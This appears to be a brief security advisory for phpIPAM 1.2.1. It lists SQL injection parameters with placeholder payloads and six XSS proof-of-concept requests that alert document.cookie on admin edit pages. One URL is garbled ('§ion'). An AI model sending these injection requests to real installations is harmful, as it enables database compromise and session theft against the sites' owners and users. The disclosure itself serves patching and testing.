PHPIPAM 1.2.1 Multiple Vulnerabilities
SQL Injection Vulnerability (3 Items): on Tools>Changelog [sPage] Parameter is vulnerable against SQLi. Method: GET Payload: http://[Site]/phpipam/?page=tools§ion=changelog&subnetId=a&sPage=50' [SQLi] on http://[Site]/phpipam/app/tools/user-menu/user-edit.php [lang] and [printLimit] Parameters are vulnerable against SQLi. Payload: Method : POST PostData= real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&mailNotify=No&mailChangelog=No&printLimit=30&lang=9'[SQLi] OR Method : POST http://[Site]/phpipam/app/tools/user-menu/user-edit.php PostData= real_name=phpIPAM+Admin&email=admin%40domain.local&password1=&password2=&lang=9&mailNotify=No&mailChangelog=No&printLimit=30'[SQLi] XSS Vulnerability (36 Items): Method: POST http://[Site]/phpipam/app/admin/languages/edit.php PostData: langid=2"><script>alert(document.cookie);</script>&action=edit http://[Site]/phpipam/app/admin/languages/edit.php PostData: langid=2&action=edit"><script>alert(document.cookie);</script> http://[Site]/phpipam/app/admin/widgets/edit.php PostData: wid=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&action=edit http://[Site]/phpipam/app/admin/widgets/edit.php PostData: wid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT> http://[Site]/phpipam/app/admin/scan-agents/edit.php PostData: id=1&actio"><script>alert(document.cookie);</script>n=edit http://[Site]/phpipam/app/admin/scan-agents/edit.php PostData: id=1&action=edit"><script>alert(document.cookie);</script>